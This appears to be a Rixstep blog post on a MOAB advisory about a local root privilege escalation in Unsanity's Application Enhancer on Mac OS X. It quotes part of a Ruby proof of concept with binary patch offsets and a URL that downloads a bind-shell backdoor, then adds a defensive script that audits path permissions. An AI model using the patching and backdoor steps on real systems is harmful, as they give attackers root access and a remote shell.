Rixstep

A Totally Unsane Privilege Escalation

The MOAB crew do it again.


If anyone doubted the MOAB team could do their thing; if anyone secretly wished OS X were so secure no one had to worry; if fanboys cringed at the thought someone would be so mean to their precious platform; then those sentiments were dashed last Friday with the release of the highly embarrassing 'repair permissions' advisory. The fanboys aren't quite back on their feet again and here comes the next blow.

Everyone's favourite Pandora's Box is affected by a local privilege escalation vulnerability which allows users to gain root privileges by either patching the APE binary or replacing it.

The POC drops a back door on the system by patching the original APE binary which results in the aped daemon running with root privileges.

require 'fileutils'

# Define offsets to opcodes to be patched
PATCH_INSTRUCTIONS =  [
                        [ 27512,  "\x38\x60\x00\x00"         ],
                        [ 115586, "\x31\xc0\x90\x89\x04\x24" ]
                      ]

BACKDOO_URL = "http://projects.info-pull.com/moab/bug-files/sample-back" # must be fat binary, sample bind shell
PATH_TO_APE = "/Library/Frameworks/ApplicationEnhancer.framework"
PATH_TO_APU = "/Library/Frameworks/ApplicationUnenhancer.framework"

path_to_bozo  = (ARGV[0] || File.join(PATH_TO_APE,"Versions/Current/ApplicationEnhancer"))

The POC is 'benign' enough to create a backup in case you really really want to keep using Unsanity's products after this.

Workaround

From the MOAB advisory.

Stay away from Application Enhancer. It's flawed, and not just by this particular issue. If the developers have left a binary executed with root privileges at a user-writable path, they are certainly capable of doing other nonsense. The approach for fixing the MOAB issues is actually making Apple boost its vulnerability handling process, and not leveraging the work to a jackass third party which has no security background at all and spends more time flaming and insulting on a delusional IRC channel than on real work (sic, stupidity is so vindictive). Wish the ZERT guys had time to work on the stuff, they rock the house and have skills.

Which sums it up nicely.
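The advisory's central point, a binary that runs as root sitting at a path an ordinary user can write to, is something an administrator can check for directly. The Ruby script below is an added example and is not MOAB's or Unsanity's code; it assumes the default APE location quoted in the PoC and reports every component on the way to the binary that is not root-owned or is writable by group or others.

```ruby
# Added example (not MOAB's code): audit every directory component leading to
# a binary that is executed as root. If any component is owned by a non-root
# account or is writable by group/others, a local user could replace or patch
# the binary, which is the flaw class the advisory describes for APE.
#
# Returns [[path, reason], ...]; an empty array means the chain is root-owned
# and not writable by anyone else. trusted_uids lets an admin accept extra
# owners (e.g. a dedicated daemon account) where that is deliberate.
def insecure_path_components(path, trusted_uids: [0])
  findings = []
  parts = File.expand_path(path).split(File::SEPARATOR).reject(&:empty?)
  chain = [File::SEPARATOR]
  parts.each { |p| chain << File.join(chain.last, p) }
  chain.each do |component|
    begin
      st = File.lstat(component)
    rescue Errno::ENOENT
      # A missing component is not safe: whoever can write the parent creates it.
      findings << [component, 'missing; parent owner decides what appears here']
      break
    end
    unless trusted_uids.include?(st.uid)
      findings << [component, "owned by uid #{st.uid}, not a trusted uid"]
    end
    # Permission bits on a symlink are meaningless; only its ownership matters.
    # The link target's own chain is audited separately via realpath below.
    next if st.symlink?
    mode = st.mode & 0o7777
    if mode & 0o002 != 0 && !(st.directory? && st.sticky?)
      findings << [component, format('world-writable (mode %04o)', mode)]
    elsif mode & 0o020 != 0 && st.gid != 0
      findings << [component, format('group-writable by gid %d (mode %04o)', st.gid, mode)]
    end
  end
  findings
end

# Audit both the configured path and the path it actually resolves to.
def audit_root_binary(path, trusted_uids: [0])
  findings = insecure_path_components(path, trusted_uids: trusted_uids)
  real = File.realpath(path) rescue nil
  if real && real != File.expand_path(path)
    findings += insecure_path_components(real, trusted_uids: trusted_uids)
  end
  findings.uniq
end

if __FILE__ == $0
  # Default target is the APE path from the PoC; pass another path as ARGV[0].
  target = ARGV[0] || '/Library/Frameworks/ApplicationEnhancer.framework/Versions/Current/ApplicationEnhancer'
  audit_root_binary(target).each { |path, why| puts "#{path}: #{why}" }
end
```

Run it against any launchd daemon or framework binary that is loaded into root processes; an empty report means nobody but root can swap or patch the file.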


Don't let its elegant and easy-to-use interface fool you. Beneath the surface of Mac OS X lies an industrial-strength UNIX foundation hard at work to ensure that your computing experience remains free of system crashes and compromised performance. Time-tested security protocols in Mac OS X keep your Mac out of harm's way.
 - Apple Computer

Copyright © Rixstep. All rights reserved.